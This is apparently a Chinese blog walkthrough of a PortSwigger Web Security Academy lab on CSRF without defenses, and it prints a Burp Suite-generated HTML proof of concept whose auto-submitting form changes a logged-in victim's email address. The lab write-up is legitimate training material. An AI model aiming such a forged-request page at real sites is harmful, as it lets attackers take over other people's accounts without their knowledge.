burpsuite靶场----CSRF----无防御

靶场地址

https://portswigger.net/web-security/csrf/lab-no-defenses

正式开始

1.登录

2.更改email,抓包
3.创建poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8d005f0443d44d83824cd500020014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

需要稍微改正一下(填上自动提交 <script>document.forms[0].submit();</script>)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8d005f0443d44d83824cd500020014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
  <script>document.forms[0].submit();</script>
  </body>
</html>

4.点击上方的exploit server 然后发送payload

本栏目推荐文章
• vulnhub靶场渗透学习
• 云服务器利用Docker搭建sqli-labs靶场环境
• Linux Podman安装DVWA靶场环境
• Linux Debian11使用podman安装sqli-labs靶场环境
• DVWA 靶场安装
• 【xss实战】BurpSuite-XssValidator插件 -xss自动化测试
• 【靶场部署】kali系统安装
• sqli-labs(sql注入漏洞)靶场通关笔记(慢更新)
• pikachu(渗透测试)靶场的通关笔记(持续更新）
• 您的burpsuite该更新啦！

靶场 burpsuite CSRF靶场burpsuite csrf 靶场burpsuite目录 靶场dvwa csrf 靶场burpsuite信息sql 靶场burpsuite数据sql 靶场burpsuite信息 靶场burpsuite时间oracle 靶场burpsuite xss xss1 靶场burpsuite服务器ssrf 靶场burpsuite